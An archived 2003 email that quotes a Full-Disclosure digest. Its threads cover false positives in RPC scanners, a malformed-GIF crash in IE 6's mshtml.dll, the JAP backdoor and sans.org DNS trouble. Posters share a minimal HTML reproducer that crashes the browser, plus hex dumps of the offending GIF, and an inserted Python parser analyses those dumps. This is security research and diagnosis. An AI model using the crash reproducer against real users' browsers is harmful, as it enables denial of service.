Message-ID: <017D1CFB0EC95A4F8E218DFFCAE616360790EE@ml1.jeraisy.com>
From: nrafi at jeraisy.com (Nadeem Rafi)
Subject: Scanning the PCs for RPC Vulnerability.

I have found some faults in the scanning tools available from Foundstone and Microsoft for RPC-vulnerable machines. Both of these tools are not error free. These tools are showing the IP addresses of even those machines which are Windows 9x, Windows98/Sec, Windows ME. Both tools are not free from this error.
And Foundstone's RPC Scan tool is even more error prone. Even if you have applied all the patches in the correct sequence, some of my machines are still reported as "Vulnerable".
 
If anybody has any experience with these problems or any suggestions, please let me know.
 
Best Regards,
 
Nadeem Rafi

	-----Original Message----- 
	From: full-disclosure-request@...ts.netsys.com [mailto:full-disclosure-request@...ts.netsys.com] 
	Sent: Wed 9/3/2003 3:39 AM 
	To: full-disclosure@...ts.netsys.com 
	Cc: 
	Subject: Full-Disclosure digest, Vol 1 #1083 - 33 msgs
	
	

	Today's Topics:
	
	   1. Re: Tracking a virus by logging infected machines (Joel R. Helgeson)
	   2. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tiago Halm)
	   3. RE: Tracking a virus by logging infected machines (Richard M. Smith)
	   4. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	   5. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	   6. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	   7. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (nonleft)
	   8. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (morning_wood)
	   9. RE: New Microsoft Internet Explorer  mshtml.dll Denial of Service? (Tiago Halm)
	  10. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Schmehl, Paul L)
	  11. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Steve Wray)
	  12. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Steve Wray)
	  13. Re: JAP back doored (Daniel Tams)
	  14. sans.org (lepkie)
	  15. Re: sans.org (Marcus Graf)
	  16. Re: sans.org (martin f krafft)
	  17. RE: sans.org (Jerry Heidtke)
	  18. Re: sans.org - OFFTOPIC (Kurt Seifried)
	  19. RE: sans.org (Ryan Lowdermilk)
	  20. Re: sans.org (B3r3n)
	  21. Re: sans.org (Bernie, CTA)
	  22. RE: sans.org (Joshua Thomas)
	  23. Re: sans.org (Ben Nelson)
	  24. RE: sans.org (NDG)
	  25. Re: atari800 (200309-07) (- o s g o -)
	  26. RE: sans.org (Richard M. Smith)
	  27. RE: Email for sans.org? (Richard M. Smith)
	  28. Re: sans.org (james)
	  29. RE: sans.org - OFFTOPIC (David Vincent)
	  30. The Worm tard who got busted (Andre Ludwig)
	  31. Re: sans.org (Kurt Seifried)
	  32. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	
	--__--__--
	
	Message: 1
	From: "Joel R. Helgeson" <joel@...geson.com>
	To: <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] Tracking a virus by logging infected machines
	Date: Tue, 2 Sep 2003 11:06:54 -0500
	
	Why would any virus writer do this?  This leads a clear audit trail that
	would lead the authorities directly back to the creator.
	
	I suppose it wouldn't be a bad thing if the virus author was looking for
	some free room & board for the next 5-10 years.
	
	Joel R. Helgeson
	Director of Networking & Security Services
	SymetriQ Corporation
	
	"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll
	be warm for the rest of his life."
	----- Original Message -----
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <jasonc@...ence.org>; <full-disclosure@...ts.netsys.com>
	Sent: Monday, September 01, 2003 6:38 PM
	Subject: [Full-Disclosure] Tracking a virus by logging infected machines
	
	
	> Hi Jason,
	>
	>    >>> Is there any way to determine who the winner is?
	>
	> Not that I want to encourage virus writing, but I think it would be very
	> helpful to gather infection statistics if a  virus were to keep a log of
	> the IP addresses of all the machines it infected.  The log could be
	> appended to the end of the executable file of the virus.  Each copy of a
	> worm or virus would contain a record of one branch of the tree of
	> infected machines.
	>
	> To make a log easy to locate and extract, the log can start with an
	> easily identified string such as "VIRUS INFECTION LOG\n".  IP addresses
	> should be recorded in ASCII with a \n between each IP address.
	>
	> Richard
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	
	--__--__--
	
	Message: 2
	From: "Tiago Halm" <thalm@...cabo.pt>
	To: "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 17:36:30 +0100
	
	Paul has a point here, I believe!
	
	After a **lot** of html code "trimming" I came with an offline version of
	the page like this:
	
	------------------------------------------------------
	<html>
	<body>
	<table border="0" cellspacing="0" cellpadding="0">
	<tr>
	    <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1"
	alt=""></td>
	</tr>
	</table>
	</body>
	</html>
	-------------------------------------------------------
	
	and this piece of code does crash my browser (6.0.2800.1106)
	on windows 2000 server all patches and fixes up to date.
	
	NOTE: Every time you **want** the browser to crash, you must delete it from
	the "Temporary Internet Files" before loading it in your browser.
	
	Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
	unrecognized image header".
	Does this image, in some way, affect the way IE does the parsing?
	Seems like it...
	
	Regards,
	Tiago Halm
	
	
	-----Original Message-----
	From: full-disclosure-admin@...ts.netsys.com
	[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Pellmann Paul
	Sent: terça-feira, 2 de Setembro de 2003 16:20
	To: 'full-disclosure@...ts.netsys.com'
	Subject: AW: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	Denial of Service?
	
	
	This seems to be caused by the 1x1 image http://www.galad.com/frame/e1x1.gif
	used within the page. If I block this URL the IE stops crashing with that
	page.
	
	cu
	Paul
	
	
	> > Its a mail client issue; doesn't happen if you click on
	> > a link from Internet Explorer.
	>
	> No, I am very sure that this happens also, if you follow the
	> link inside
	> a web page only (without an involving mail client).
	>
	> So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> click the link that says "Holger Hasselbach has translated several
	> issues of Crypto-Gram into German [...]". The error occurs as
	> described in my original posting.
	>
	> > Your mail headers don't exactly give away your own mail client.
	> > What would it be?
	>
	> Microsoft Outlook 2002 SP2 on Windows XP Professional
	>
	> Yours,
	>
	> Marc Ruef
	>
	
	--__--__--
	
	Message: 3
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: "'Joel R. Helgeson'" <joel@...geson.com>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] Tracking a virus by logging infected machines
	Date: Tue, 2 Sep 2003 12:43:43 -0400
	
	To show off. ;-)  The author of the Marker virus did exactly this.
	
	Richard
	
	-----Original Message-----
	From: full-disclosure-admin@...ts.netsys.com
	[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joel R.
	Helgeson
	Sent: Tuesday, September 02, 2003 12:07 PM
	To: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] Tracking a virus by logging infected
	machines
	
	
	Why would any virus writer do this?  This leads a clear audit trail that
	would lead the authorities directly back to the creator.
	
	I suppose it wouldn't be a bad thing if the virus author was looking for
	some free room & board for the next 5-10 years.
	
	Joel R. Helgeson
	Director of Networking & Security Services
	SymetriQ Corporation
	
	"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll
	be warm for the rest of his life."
	----- Original Message -----
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <jasonc@...ence.org>; <full-disclosure@...ts.netsys.com>
	Sent: Monday, September 01, 2003 6:38 PM
	Subject: [Full-Disclosure] Tracking a virus by logging infected machines
	
	
	> Hi Jason,
	>
	>    >>> Is there any way to determine who the winner is?
	>
	> Not that I want to encourage virus writing, but I think it would be very
	> helpful to gather infection statistics if a  virus were to keep a log of
	> the IP addresses of all the machines it infected.  The log could be
	> appended to the end of the executable file of the virus.  Each copy of a
	> worm or virus would contain a record of one branch of the tree of
	> infected machines.
	>
	> To make a log easy to locate and extract, the log can start with an
	> easily identified string such as "VIRUS INFECTION LOG\n".  IP addresses
	> should be recorded in ASCII with a \n between each IP address.
	>
	> Richard
	>
	
	
	--__--__--
	
	Message: 4
	Date: Tue, 2 Sep 2003 10:38:07 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: Tiago Halm <thalm@...cabo.pt>
	Cc: "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	
	Interesting...
	
	> After a **lot** of html code "trimming" I came with an offline version of
	> the page like this:
	>
	> ------------------------------------------------------
	> <html>
	> <body>
	> <table border="0" cellspacing="0" cellpadding="0">
	> <tr>
	>     <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1"
	> alt=""></td>
	> </tr>
	> </table>
	> </body>
	> </html>
	> -------------------------------------------------------
	>
	> and this piece of code does crash my browser (6.0.2800.1106)
	> on windows 2000 server all patches and fixes up to date.
	>
	> NOTE: Every time you **want** the browser to crash, you must delete it from
	> the "Temporary Internet Files" before loading it in your browser.
	>
	> Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
	> unrecognized image header".
	> Does this image, in some way, affects the way IE does the parsing?
	> Seems like it...
	
	
	Yeah, the GIF image is almost certainly mal-formed.  Not sure in what
	way yet, as I am no GIF expert.  Some interesting information though:
	
	Opening it in the GIMP produces the following errors on stderr:
	
	GIF: too much input data, ignoring extra...
	GIF: bogus character 0x00, ignoring
	
	
	The file's contents are:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   FF FF FF 21  F9 04 01 00  00 01 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 02 02 4C  01 00 3B                  .......L..;
	
	I then opened the file in the GIMP, and immediately saved it back to
	another gif file, and it wrote:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   00 00 00 21  F9 04 01 00  00 00 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 00 01 01  00 3B                     .........;
	
	
	Which obviously has some differences.  Anyone else better with GIF89a
	than I?
	
	tim
	
	
	--__--__--
	
	Message: 5
	Date: Tue, 2 Sep 2003 10:42:58 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: Irwan Hadi <irwanhadi@...by.com>
	Cc: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	> Even more interesting:
	> Received: from netsys.com (NETSYS.COM [199.201.233.10])
	>         by phxby.engr.usu.edu (Postfix) with ESMTP id 4A3F11443EF
	>         for <irwanhadi@...by.engr.usu.edu>; Tue,  2 Sep 2003 02:44:14
	> -0600 (MDT)
	> Received: from NETSYS.COM (localhost [127.0.0.1])
	>         by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827wOx20101;
	>         Tue, 2 Sep 2003 03:58:24 -0400 (EDT)
	> Received: from phxby.engr.usu.edu (phxby.engr.usu.edu [129.123.21.101])
	>         by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827uUE19665
	>         for <full-disclosure@...ts.netsys.com>; Tue, 2 Sep 2003 03:56:30
	> -0400 (EDT)
	> Received: by phxby.engr.usu.edu (Postfix, from userid 501)
	>         id 6607B14438C; Tue,  2 Sep 2003 01:56:24 -0600 (MDT)
	>
	> I believe that for infosec stuffs, the faster information being
	> distributed/sent is the better. Late putting patch just because the
	> information come almost 1 hour later after it is sent might be
	> catastrophic.
	
	I don't know about catastrophic, but it certainly should be faster.  I
	personally find the speed of this list unacceptable.  For large lists
	with high volume, a list server written in a scripting language like
	python isn't going to cut it, IMHO.  I vote for qmail w/ ezmlm(-idx).
	(That is, if we get a vote in the matter.)
	
	tim
	
	
	--__--__--
	
	Message: 6
	Date: Tue, 2 Sep 2003 10:51:45 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: Tiago Halm <thalm@...cabo.pt>
	Cc: "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	
	Error in my last post.  I switched the order of the original and GIMP
	produced .gif on accident.  To clarify:
	
	Original:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   00 00 00 21  F9 04 01 00  00 00 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 00 01 01  00 3B                     .........;
	
	
	Processed and re-saved by GIMP:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   FF FF FF 21  F9 04 01 00  00 01 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 02 02 4C  01 00 3B                  .......L..;
	
	
	tim
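
Added example (not part of the original posts): a minimal GIF block walker in Python, run over the two hex dumps from Message 6, showing which structural fields differ between the original file and GIMP's re-saved copy. The function names are this example's own, and the 2..8 range for the LZW minimum code size is taken from the GIF89a specification; the thread does not establish which field triggers the crash.

```python
import struct

# Bytes transcribed from the "Original" and "re-saved by GIMP" dumps in Message 6.
ORIGINAL = bytes.fromhex(
    "47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF "
    "00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00 "
    "01 00 01 00 00 00 01 01 00 3B")
RESAVED = bytes.fromhex(
    "47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF "
    "FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00 "
    "01 00 01 00 00 02 02 4C 01 00 3B")


def _sub_blocks(buf, pos):
    """Concatenate size-prefixed data sub-blocks up to the 0x00 terminator."""
    out = bytearray()
    while True:
        size = buf[pos]                 # IndexError if the chain runs off the end
        pos += 1
        if size == 0:
            return bytes(out), pos
        if pos + size > len(buf):
            raise IndexError("sub-block truncated")
        out += buf[pos:pos + size]
        pos += size


def parse_gif(buf):
    """Walk a GIF's blocks; return the parsed fields plus a list of findings."""
    if buf[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("missing GIF signature")
    info = {"images": [], "findings": [], "palette": [],
            "transparent_index": None, "trailing_bytes": 0}
    try:
        # Logical screen descriptor: width, height, packed flags, bg index, aspect.
        width, height, packed, _bg, _aspect = struct.unpack_from("<HHBBB", buf, 6)
        info["screen"] = (width, height)
        pos = 13
        if packed & 0x80:               # global colour table present
            n = 2 << (packed & 0x07)
            if pos + 3 * n > len(buf):
                raise IndexError("colour table truncated")
            info["palette"] = [tuple(buf[pos + 3 * i:pos + 3 * i + 3])
                               for i in range(n)]
            pos += 3 * n
        while True:
            intro = buf[pos]
            pos += 1
            if intro == 0x3B:           # trailer
                info["trailing_bytes"] = len(buf) - pos
                if info["trailing_bytes"]:
                    info["findings"].append("data after trailer")
                break
            if intro == 0x21:           # extension block
                label = buf[pos]
                data, pos = _sub_blocks(buf, pos + 1)
                if label == 0xF9 and len(data) == 4:   # graphic control extension
                    flags, _delay, tindex = struct.unpack("<BHB", data)
                    if flags & 0x01:
                        info["transparent_index"] = tindex
            elif intro == 0x2C:         # image descriptor + LZW image data
                left, top, w, h, ipacked = struct.unpack_from("<HHHHB", buf, pos)
                pos += 9
                if ipacked & 0x80:      # skip a local colour table
                    pos += 3 * (2 << (ipacked & 0x07))
                min_code = buf[pos]
                data, pos = _sub_blocks(buf, pos + 1)
                idx = len(info["images"])
                info["images"].append({"size": (w, h), "data": data,
                                       "lzw_min_code_size": min_code})
                if not 2 <= min_code <= 8:
                    info["findings"].append(
                        "image %d: LZW minimum code size %d is outside 2..8"
                        % (idx, min_code))
                if left + w > width or top + h > height:
                    info["findings"].append(
                        "image %d extends past the logical screen" % idx)
            else:
                info["findings"].append(
                    "unknown block introducer 0x%02X at offset %d" % (intro, pos - 1))
                break
    except (IndexError, struct.error):
        info["findings"].append("file truncated inside a block")
    return info


def differing_fields(a, b):
    """Return {field: (value_in_a, value_in_b)} for parsed fields that differ."""
    def flat(p):
        return {"palette": p["palette"],
                "transparent_index": p["transparent_index"],
                "lzw_min_code_size": [i["lzw_min_code_size"] for i in p["images"]],
                "image_data": [i["data"] for i in p["images"]]}
    fa, fb = flat(parse_gif(a)), flat(parse_gif(b))
    return {k: (fa[k], fb[k]) for k in fa if fa[k] != fb[k]}


if __name__ == "__main__":
    for name, blob in (("original", ORIGINAL), ("re-saved", RESAVED)):
        print(name, parse_gif(blob)["findings"])
    for field, pair in differing_fields(ORIGINAL, RESAVED).items():
        print(field, pair)
```
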
	
	
	--__--__--
	
	Message: 7
	Date: Tue, 02 Sep 2003 20:14:52 +0200
	To: "Tiago Halm" <thalm@...cabo.pt>, "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	From: nonleft <nonleft@....net>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer
	  mshtml.dll Denial of Service?
	
	
	could you figure out if it is a webbug then or just a transgif for layout?
	
	kind regards
	nonleft
	
	
	At 17:36 02.09.2003 +0100, Tiago Halm wrote:
	>Paul has a point here, I believe!
	>
	>After a **lot** of html code "trimming" I came with an offline version of
	>the page like this:
	>
	>------------------------------------------------------
	>2bd125.jpg
	>-------------------------------------------------------
	>
	>and this piece of code does crash my browser (6.0.2800.1106)
	>on windows 2000 server all patches and fixes up to date.
	>
	>NOTE: Every time you **want** the browser to crash, you must delete it from
	>the "Temporary Internet Files" before loading it in your browser.
	>
	>Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
	>unrecognized image header".
	>Does this image, in some way, affects the way IE does the parsing?
	>Seems like it...
	>
	>Regards,
	>Tiago Halm
	>
	>
	>-----Original Message-----
	>From: full-disclosure-admin@...ts.netsys.com
	>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Pellmann Paul
	>Sent: terça-feira, 2 de Setembro de 2003 16:20
	>To: 'full-disclosure@...ts.netsys.com'
	>Subject: AW: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	>Denial of Service?
	>
	>
	>This seems to be caused by the 1x1 image http://www.galad.com/frame/e1x1.gif
	>used within the page. If I block this URL the IE stops crashing with that
	>page.
	>
	>cu
	>Paul
	>
	>
	> > > Its a mail client issue; doesn't happen if you click on
	> > > a link from Internet Explorer.
	> >
	> > No, I am very sure that this happens also, if you follow the
	> > link inside
	> > a web page only (without an involving mail client).
	> >
	> > So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> > click the link that says "Holger Hasselbach has translated several
	> > issues of Crypto-Gram into German [...]". The error occurs as
	> > described in my original posting.
	> >
	> > > Your mail headers don't exactly give away your own mail client.
	> > > What would it be?
	> >
	> > Microsoft Outlook 2002 SP2 on Windows XP Professional
	> >
	> > Yours,
	> >
	> > Marc Ruef
	> >
	
	
	--__--__--
	
	Message: 8
	From: "morning_wood" <se_cur_ity@...mail.com>
	To: "Tim" <tim-security@...tinelchicken.org>,
	   "Irwan Hadi" <irwanhadi@...by.com>
	Cc: <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 11:23:09 -0700
	
	> > I believe that for infosec stuffs, the faster information being
	> > distributed/sent is the better. Late putting patch just because the
	> > information come almost 1 hour later after it is sent might be
	> > catastrophic.
	>
	> I don't know about catastrophic, but it certainly should be faster.  I
	> personally find the speed of this list unacceptable.  For large lists
	> with high volume, a list server written in a scripting language like
	> python isn't going to cut it, IMHO.  I vote for qmail w/ ezmlm(-idx).
	> (That is, if we get a vote in the matter.)
	
	funny, i often see replies to my post long before i see my own post
	don't know why, doesn't always happen. But it is odd.
	Sometimes I wonder if the list is being siphoned for breaking sec info before
	the posts reach the subscribers.
	
	Donnie Werner
	http://e2-labs.com
	
	
	--__--__--
	
	Message: 9
	From: "Tiago Halm" <thalm@...cabo.pt>
	To: "'nonleft'" <nonleft@....net>, "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer  mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 19:49:07 +0100
	
	My feeling is that the following facts:
	
	- rendering engine of IE, complemented with the "online" download of the
	image
	- possible malformation of the image
	
	lead to this outcome (browser crash).
	There must be some code inside mshtml.dll that "crashes" when parsing the
	image.
	
	I get this "Application" event with source "Microsoft Internet Explorer", ID
	= 1000:
	-------------
	Faulting application iexplore.exe, version 6.0.2800.1106, faulting module
	mshtml.dll, version 6.0.2800.1226, fault address 0x00180ede.
	-------------
	
	This is not a webbug. I think this is only a transgif for layout (as you put
	it).
	And IE should take the image as invalid and should not even try to display
	it.
	
	Regards,
	Tiago Halm
	
	-----Original Message-----
	From: nonleft [mailto:nonleft@....net]
	Sent: terça-feira, 2 de Setembro de 2003 19:15
	To: Tiago Halm; 'Pellmann Paul'; full-disclosure@...ts.netsys.com
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	Denial of Service?
	
	
	could you figure out if it is a webbug then or just a transgif for layout?
	
	kind regards
	nonleft
	
	
	At 17:36 02.09.2003 +0100, Tiago Halm wrote:
	>Paul has a point here, I believe!
	>
	>After a **lot** of html code "trimming" I came with an offline version
	>of the page like this:
	>
	>------------------------------------------------------
	>2bd125.jpg
	>-------------------------------------------------------
	>
	>and this piece of code does crash my browser (6.0.2800.1106) on windows
	>2000 server all patches and fixes up to date.
	>
	>NOTE: Every time you **want** the browser to crash, you must delete it
	>from the "Temporary Internet Files" before loading it in your browser.
	>
	>Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a
	>"Bad or unrecognized image header". Does this image, in some way,
	>affects the way IE does the parsing? Seems like it...
	>
	>Regards,
	>Tiago Halm
	>
	>
	>-----Original Message-----
	>From: full-disclosure-admin@...ts.netsys.com
	>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Pellmann
	>Paul
	>Sent: terça-feira, 2 de Setembro de 2003 16:20
	>To: 'full-disclosure@...ts.netsys.com'
	>Subject: AW: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	>Denial of Service?
	>
	>
	>This seems to be caused by the 1x1 image
	>http://www.galad.com/frame/e1x1.gif
	>used within the page. If I block this URL the IE stops crashing with that
	>page.
	>
	>cu
	>Paul
	>
	>
	> > > Its a mail client issue; doesn't happen if you click on
	> > > a link from Internet Explorer.
	> >
	> > No, I am very sure that this happens also, if you follow the link
	> > inside a web page only (without an involving mail client).
	> >
	> > So go to http://www.counterpane.com/crypto-gram.html , scroll down
	> > and click the link that says "Holger Hasselbach has translated
	> > several issues of Crypto-Gram into German [...]". The error occurs
	> > as described in my original posting.
	> >
	> > > Your mail headers don't exactly give away your own mail client.
	> > > What would it be?
	> >
	> > Microsoft Outlook 2002 SP2 on Windows XP Professional
	> >
	> > Yours,
	> >
	> > Marc Ruef
	> >
	
	
	--__--__--
	
	Message: 10
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 14:31:06 -0500
	From: "Schmehl, Paul L" <pauls@...allas.edu>
	Cc: <full-disclosure@...ts.netsys.com>
	
	> -----Original Message-----
	> From: morning_wood [mailto:se_cur_ity@...mail.com]
	> Sent: Tuesday, September 02, 2003 1:23 PM
	> To: Tim; Irwan Hadi
	> Cc: full-disclosure@...ts.netsys.com
	> Subject: Re: [Full-Disclosure] New Microsoft Internet
	> Explorer mshtml.dll Denial of Service?
	>
	> funny, i often see replies to my post long before i see my
	> own post don't know why, doesn't always happen. But it is odd.
	> Sometimes I wonder if the list is being siphoned for breaking
	> sec info before the posts reach the subscribers.
	
	More likely what you're seeing is the duplicate copy sent to your email
	address because the default for this list is reply to sender.  So most
	people just reply to all, and the cc list gets longer and longer and
	longer.  Later on, your post shows up on the list, so you see it then.
	But the replies come to you directly and much faster.
	
	Paul Schmehl (pauls@...allas.edu)
	Adjunct Information Security Officer
	The University of Texas at Dallas
	AVIEN Founding Member
	http://www.utdallas.edu/~pauls/
	
	
	--__--__--
	
	Message: 11
	From: "Steve Wray" <steve.wray@...adise.net.nz>
	To: "'Marc Ruef'" <maru@...p.ch>, <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Wed, 3 Sep 2003 08:04:36 +1200
	
	Ok I went there and no crash!
	:)
	Here's the html that I created to test the principle as
	well.
	
	My MSIE is 6.0.2800.1106.xpsp2.030422-1633
	
	I only experience the crash when clicking in Outlook 2002.
	
	
	[snip]
	> > Its a mail client issue; doesn't happen if you click on
	> > a link from Internet Explorer.
	>
	> No, I am very sure that this happens also, if you follow the
	> link inside
	> a web page only (without an involving mail client).
	>
	> So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> click the link that says "Holger Hasselbach has translated several
	> issues of Crypto-Gram into German [...]". The error occurs as
	> described
	> in my original posting.
	>
	> > Your mail headers don't exactly give away your own mail client.
	> > What would it be?
	>
	> Microsoft Outlook 2002 SP2 on Windows XP Professional
	>
	> Yours,
	>
	> Marc Ruef
	
	
	--__--__--
	
	Message: 12
	From: "Steve Wray" <steve.wray@...adise.net.nz>
	To: "'Tiago Halm'" <thalm@...cabo.pt>,
	   "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Wed, 3 Sep 2003 08:16:21 +1200
	
	So why is it that visiting the page directly from MSIE
	from html like this;
	<html>
	<head>
	</head>
	<body>
	<a href="http://www.galad.com/extras/cg/cg.htm">crash</a>
	</body>
	</html>
	
	I get no crash?
	But clicking through from outlook I do?
	Ie; clicking from outlook = crash
	clicking from IE = no crash
	clicking from outlook afterward = crash
	
	
	> -----Original Message-----
	> From: full-disclosure-admin@...ts.netsys.com
	> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
	> Tiago Halm
	> Sent: Wednesday, 3 September 2003 4:37 a.m.
	> To: 'Pellmann Paul'; full-disclosure@...ts.netsys.com
	> Subject: RE: [Full-Disclosure] New Microsoft Internet
	> Explorer mshtml.dll Denial of Service?
	>
	>
	> Paul has a point here, I believe!
	>
	> After a **lot** of html code "trimming" I came with an
	> offline version of
	> the page like this:
	>
	> ------------------------------------------------------
	> <html>
	> <body>
	> <table border="0" cellspacing="0" cellpadding="0">
	> <tr>
	>     <td><img src="http://www.galad.com/frame/e1x1.gif"
	> width="1" height="1"
	> alt=""></td>
	> </tr>
	> </table>
	> </body>
	> </html>
	> -------------------------------------------------------
	>
	> and this piece of code does crash my browser (6.0.2800.1106)
	> on windows 2000 server all patches and fixes up to date.
	>
	> NOTE: Every time you **want** the browser to crash, you must
	> delete it from
	> the "Temporary Internet Files" before loading it in your browser.
	
	
	--__--__--
	
	Message: 13
	Date: Tue, 2 Sep 2003 22:22:02 +0200 (CEST)
	From: Daniel Tams <dantams@...ieltams.dyndns.org>
	To: Helmut Hauser <helmut.hauser@...raplan.de>
	cc: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] JAP back doored
	
	On Tue, 2 Sep 2003, Helmut Hauser wrote:
	
	> The German police (BKA) struck again against the An.on Team
	>
	> See http://www.datenschutzzentrum.de/material/themen/presse/anon-bka.htm
	
	The choice of your subject line makes it seem that the article says that
	JAP has been backdoored again. The article does not say that. The article
	says that the police received a court order permitting them to enter and
	search the facilities of the Technical University of Dresden in order to
	find the data that was captured by the backdoor when it was in use.
	
	- Daniel
	
	
	--__--__--
	
	Message: 14
	Date: Tue,  2 Sep 2003 12:29:47 -0700
	To: full-disclosure@...ts.netsys.com
	Cc:
	From: "lepkie" <lepkie@...hmail.com>
	Reply-To: lepkie@...tmail.com
	Subject: [Full-Disclosure] sans.org
	
	maybe off topic
	
	can anyone resolve www.sans.org or www.incidents.org?
	I tried several name servers and none return an A record.
	
	%> host www.sans.org ns2.berkeley.edu
	%> host www.sans.org ns1.ems.psu.edu
	%> etc ....
	
	all report not found.
	
	Did they forget to pay the reg fee?
	
	
	
	
	--__--__--
	
	Message: 15
	From: "Marcus Graf" <m.graf@...menwelt.de>
	To: full-disclosure@...ts.netsys.com
	Date: Tue, 02 Sep 2003 23:11:41 +0200
	Subject: Re: [Full-Disclosure] sans.org
	
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	
	no problems:
	www.sans.org => 65.173.218.106
	www.incidents.org => 63.100.47.45
	
	but the traceroute from here to www.sans.org dies at
	sl-escal-1-0-0.sprintlink.net [160.81.98.26]
	
	and the traceroute to www.incidents.org is interesting:
	
	...
	... 500.ATM4-0.GW5.IAD5.ALTER.NET [152.63.43.137]
	... 192.168.11.9 [192.168.11.9]
	
	misconfigured NAT ???
	
	Ciao
	  Marcus
	
	--
	Windows is not the answer.
	Windows is the question and the answer is no.
	
	
	
	--__--__--
	
	Message: 16
	Date: Tue, 2 Sep 2003 23:35:30 +0200
	From: martin f krafft <madduck@...duck.net>
	To: full-disclosure@...ts.netsys.com
	Subject: [Full-Disclosure] Re: sans.org
	
	
	
	also sprach lepkie <lepkie@...hmail.com> [2003.09.02.2129 +0200]:
	> can anyone resolve www.sans.org or www.incidents.org?
	
	no.
	
	> Did they forget to pay the reg fee?
	
	      Created on..............: Fri, Aug 04, 1995
	      Expires on..............: Tue, Aug 03, 2010
